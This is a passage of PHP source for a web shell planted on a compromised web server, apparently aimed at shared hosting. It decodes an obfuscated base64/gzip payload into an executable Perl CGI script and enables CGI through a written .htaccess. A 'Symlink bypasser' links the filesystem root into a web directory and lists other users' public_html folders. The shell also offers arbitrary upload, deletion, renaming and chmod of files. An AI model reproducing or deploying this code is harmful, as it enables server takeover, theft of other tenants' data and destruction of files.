1425$da='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';
1426$decryp=gzinflate(base64_decode($da));
1427mkdir('perl', 0777);
1428$hope = fopen("perl/.htaccess", 'w');
1429$hcon= "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .root\nAddHandler cgi-script .root\nAddHandler cgi-script .root";
1430fwrite ( $hope, $hcon ) ;
1431$pelfile = fopen("perl/in.root" ,"w");
1432fwrite ($pelfile,$decryp);
1433 chmod("perl/in.root",0755);
1434 echo "<iframe src=perl/in.root width=50% height=70% ></iframe><br><br> ";
1435 echo "<font size=4>check in this directory for configuration files once you have done with this script<br><a href=perl/><u>Open Configuration File</u></a></font>";
1436
1437}
1438?>
1439<form method=post>
1440<font color=white size=2>Symlink bypasser ( Use this tools if Cant read /etc/named ) </font><p>
1441<input type=submit name="ms" value="Let's Do it " /></form>
1442<?php
1443 if(isset($_POST['ms']))
1444 {
1445 error_reporting(0);
1446 $cmd="ls /var/named";
1447 $r=shell_exec($cmd);
1448
1449
1450 mkdir('SymSec',0777);
1451
1452
1453
1454
1455$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1456$f = fopen('SymSec/.htaccess','w');
1457
1458$security = symlink("/","SymSec/root");
1459
1460fwrite($f , $rr);
1461 ?><form method=post><textarea rows=1 cols=1 name=web><?php echo $r;?></textarea><br><input type=submit name=w value="Start the game " />
1462</form>
1463<?php
1464
1465 }
1466
1467error_reporting(0);
1468$webs=explode("\n",$_POST['web']);
1469if(isset($_POST['w']))
1470{
1471$webs=explode("\n",$_POST['web']);
1472echo "<table width=40% align=center border=1>
1473<tr><td align=center>Websites</td><td align=center>usernames</td><td>symlink</td></tr>";
1474foreach($webs as $f)
1475{
1476 $str=substr_replace($f,"",-4);
1477
1478
1479$user = posix_getpwuid(@fileowner("/etc/valiases/".$str));
1480
1481echo "<table border=1 width=40%><tr><td align=center><font color=red>".$str."</font></td><td align=center><font color=white>".$user['name']."</td><td><a href=SymSec/root/home/".$user['name']."/public_html/>Open the Symlink file</a></tr></table>"; flush();
1482
1483
1484
1485
1486
1487 }
1488
1489 }
1490
1491
1492?>
1493<?php
1494echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
1495echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
1496if( $_POST['_upl'] == "Upload" ) {
1497if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success ^_^ <b><br><br>'; }
1498else { echo '<b>Upload Failed :( </b><br><br>'; }
1499}
1500?>
1501<?php
1502//Make directory stuff
1503if (isset($_POST['do_create_dir'])) {
1504 $cdir = $_POST['create_dir'];
1505 if (is_dir($cdir)) {
1506 success("dir_exists", $cdir);
1507 } else {
1508 if (mkdir($cdir, 0777)) {
1509 success("createdir", $cdir);
1510 } else {
1511 error("Directory was not created!");
1512 }
1513 }
1514}
1515//Make file stuff
1516if (isset($_POST['do_create_file'])) {
1517 $cfile = $_POST['create_file'];
1518 if (file_exists($cfile)) {
1519 success("file_exists", $cfile);
1520 } else {
1521 if (fopen($cfile, "w+")) {
1522 success("file_created", $cfile);
1523 } else {
1524 error("File was not created");
1525 }
1526 }
1527}
1528//Go directory
1529if (isset($_POST['do_go_dir'])) {
1530 $godir = $_POST['go_dir'];
1531 echo "<script>window.location = 'http://$domain$script?path=$godir'</script>";
1532}
1533//Go Edit file
1534if (isset($_POST['do_go_edit'])) {
1535 $gefile = $_POST['go_edit_file'];
1536 if (file_exists($gefile)) {
1537 header("Location: http://$domain$script?editfile=$gefile");
1538 } else {
1539 error("File does not exist!");
1540 }
1541}
1542//Upload File
1543if (isset($_POST['do_upload_file'])) {
1544 $udir = $_POST['upload_location'];
1545 $uname = $_FILES['upload_file']['name'];
1546 $both = "$udir$uname";
1547 if (file_exists($both)) {
1548 success("file_exists", $both);
1549 } else {
1550 switch ($_FILES['upload_file']['error']) {
1551 case 0:
1552 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
1553 success("file_uploaded");
1554 } else {
1555 error("Failed To Upload File!");
1556 }
1557 }
1558 }
1559}
1560//Kill Shell >_<
1561if (isset($_GET['kill'])) {
1562 if (unlink("$dir/$script2")) {
1563 success("shell_killed");
1564 } else {
1565 error("Failed to kill shell!");
1566 }
1567}
1568//Delete Directory
1569if (isset($_GET['deldir'])) {
1570 $deldir = $_GET['deldir'];
1571 $redir = dirname($deldir);
1572 if (rmdir($deldir)) {
1573 success("dir_del", rtrim($redir, '/'));
1574 } else {
1575 error("Failed to delete directory!");
1576 }
1577}
1578//Rename Directory
1579if (isset($_GET['rendir'])) {
1580 $rendir = $_GET['rendir'];
1581 $dend = $_GET['old'];
1582 echo "<center>
1583<form action='' method='post'>
1584<input type='text' class='text' name='new_dir_name' value='$dend'>
1585<input type='submit' name='do_rename_dir' value='Rename'>
1586</center>";
1587}
1588if (isset($_POST['do_rename_dir'])) {
1589 $newdir = $_POST['new_dir_name'];
1590 $rendir = $_GET['rendir'];
1591 $dend = $_GET['old'];
1592 if (rename("$rendir/$dend", "$rendir/$newdir")) {
1593 success("dir_renamed", $rendir);
1594 } else {
1595 error("Directory was not renamed!");
1596 }
1597}
1598//Delete file
1599if (isset($_GET['delfile'])) {
1600 $delfile = $_GET['delfile'];
1601 $redir = dirname($delfile);
1602 if (unlink($delfile)) {
1603 success("filedelete", rtrim($redir, '/'));
1604 } else {
1605 error("Failed to delete file!");
1606 }
1607}
1608//Rename File
1609if (isset($_GET['renfile'])) {
1610 $renfile = $_GET['renfile'];
1611 $fend = $_GET['old'];
1612 echo "<center>
1613<form action='' method='post'>
1614<input type='text' class='text' name='new_file_name' value='$fend'>
1615<input type='submit' name='do_rename_file' value='Rename'>
1616</center>";
1617}
1618if (isset($_POST['do_rename_file'])) {
1619 $newfile = $_POST['new_file_name'];
1620 $renfile = $_GET['renfile'];
1621 $fend = $_GET['old'];
1622 if (rename("$renfile/$fend", "$renfile/$newfile")) {
1623 success("file_renamed", $renfile);
1624 } else {
1625 error("File was not renamed!");
1626 }
1627}
1628//Mass Files Stuff
1629if (isset($_POST['mass_files'])) {
1630 $action = $_POST['mass_action'];
1631 $chmodvalue = $_POST['chmod_value'];
1632 $box = $_POST['delbox'];
1633 if ($action == "Delete") {
1634 foreach ($box as $b) {
1635 if (is_dir($b)) {
1636 if (rmdir($b)) {
1637 echo "<font color='green'>Deleted Directory: $b</font><br>";
1638 } else {
1639 echo "<font color='red'>Failed To Delete Directory: $b</font><br>";
1640 }
1641 } else {
1642 if (unlink($b)) {
1643 echo "<font color='green'>Deleted File: $b</font><br>";
1644 } else {
1645 echo "<font color='red'>Failed To Delete file: $b</font><br>";
1646 }
1647 }
1648 }
1649 }
1650 if ($action == "chmod") {
1651 foreach ($box as $b) {
1652 if (is_dir($b)) {
1653 if (chmod($b, $chmodvalue)) {
1654 echo "<font color='green'>Changed Permissions Of Directory: $b</font><br>";
1655 } else {
1656 echo "<font color='red'>Failed To Change Permissions Of Directory: $b</font><br>";
1657 }
1658 } else {
1659 if (chmod($b, $chmodvalue)) {
1660 echo "<font color='green'>Changed Persmissions Of File: $b</font><br>";
1661 } else {
1662 echo "<font color='red'> >_< Failed To Change Permissions Of File: $b</font><br>";
1663 }
1664 }
1665 }
1666 }
1667}
1668?></center>
1669</body>
1670</html>